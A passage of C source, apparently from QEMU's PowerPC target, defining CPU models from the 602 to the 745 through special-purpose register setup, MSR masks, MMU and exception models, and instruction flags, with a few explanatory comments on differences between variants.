PPC_602_SPEC; pcc->msr_mask = (1ull << MSR_VSX) | (1ull << MSR_SA) | (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); /* XXX: 602 MMU is quite specific. Should add a special case */ pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_602; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_603(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(603)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 603"; pcc->init_proc = init_proc_603; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_603E(CPUPPCState *env) { 
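    /* (The 603e shares the 603's SPR set, soft TLB and init sequence;
     *  only the exception model in the class init below differs:
     *  POWERPC_EXCP_603E instead of POWERPC_EXCP_603.) */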
gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(603E)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 603e"; pcc->init_proc = init_proc_603E; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603E; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_604(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_604(env); /* Time base */ gen_tbl(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_604(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(604)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 604"; pcc->init_proc = init_proc_604; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_604; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_604E(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_604(env); /* XXX : not implemented */ spr_register(env, SPR_7XX_MMCR1, "MMCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC3, "PMC3", 
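    /* (The 604e's additions over the 604: the MMCR1 performance-monitor
     *  control above plus the PMC3/PMC4 counters here, all registered as
     *  generic scratch SPRs.) */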
SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC4, "PMC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Time base */ gen_tbl(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_604(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(604E)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 604E"; pcc->init_proc = init_proc_604E; pcc->check_pow = check_pow_nocheck; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_604; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_740(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(740)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 740"; pcc->init_proc = init_proc_740; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | 
POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* * XXX: high BATs are also present but are known to be bugged on * die version 1.x */ init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750"; pcc->init_proc = init_proc_750; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750cl(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ /* Those registers are fake on 750CL */ spr_register(env, SPR_THRM1, "THRM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_THRM2, "THRM2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_THRM3, "THRM3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX: not implemented */ spr_register(env, SPR_750_TDCL, "TDCL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_TDCH, "TDCH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* DMA */ /* XXX : not implemented */ spr_register(env, SPR_750_WPAR, "WPAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_DMAL, "DMAL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_750_DMAU, "DMAU", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 
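                 /* (750CL-specific: the GQR0-GQR7 quantization registers
                  *  below scale the paired-single psq_* loads/stores, which
                  *  this model leaves unimplemented; see the instruction
                  *  list in the class init.) */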
0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750CL_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750CL_HID4, "HID4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Quantization registers */ /* XXX : not implemented */ spr_register(env, SPR_750_GQR0, "GQR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR1, "GQR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR2, "GQR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR3, "GQR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR4, "GQR4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR5, "GQR5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR6, "GQR6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750_GQR7, "GQR7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750cl has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_750cl(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750cl)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750 CL"; pcc->init_proc = init_proc_750cl; pcc->check_pow = check_pow_hid0; /* * XXX: not implemented: * cache lock instructions: * dcbz_l * floating point paired instructions * psq_lux * psq_lx * psq_stux * psq_stx * ps_abs * ps_add * ps_cmpo0 * ps_cmpo1 * ps_cmpu0 * ps_cmpu1 * ps_div * ps_madd * ps_madds0 * ps_madds1 * ps_merge00 * ps_merge01 * ps_merge10 * ps_merge11 * ps_mr * ps_msub * ps_mul * ps_muls0 * ps_muls1 * ps_nabs * ps_neg * ps_nmadd * ps_nmsub * ps_res * ps_rsqrte * ps_sel * ps_sub * ps_sum0 * ps_sum1 */ pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750cx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not 
implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* This register is not implemented but is present for compatibility */ spr_register(env, SPR_SDA, "SDA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750cx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_750cx(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750cx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750CX"; pcc->init_proc = init_proc_750cx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750fx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* XXX : not implemented */ spr_register(env, SPR_750_THRM4, "THRM4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_750FX_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750fx & 750gx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750fx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750FX"; pcc->init_proc = init_proc_750fx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | 
PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_750gx(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* XXX : not implemented */ spr_register(env, SPR_750_THRM4, "THRM4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented (XXX: different from 750fx) */ spr_register(env, SPR_750FX_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); /* PowerPC 750fx & 750gx has 8 DBATs and 8 IBATs */ gen_high_BATs(env); init_excp_7x0(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(750gx)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 750GX"; pcc->init_proc = init_proc_750gx; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_7x0; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_745(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); gen_spr_G2_755(env); /* Time base */ gen_tbl(env); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", 
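    /* (The 745 combines the 7x0 SPR set with the G2/755 extensions
     *  registered above and the 6xx software TLB set up below.) */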
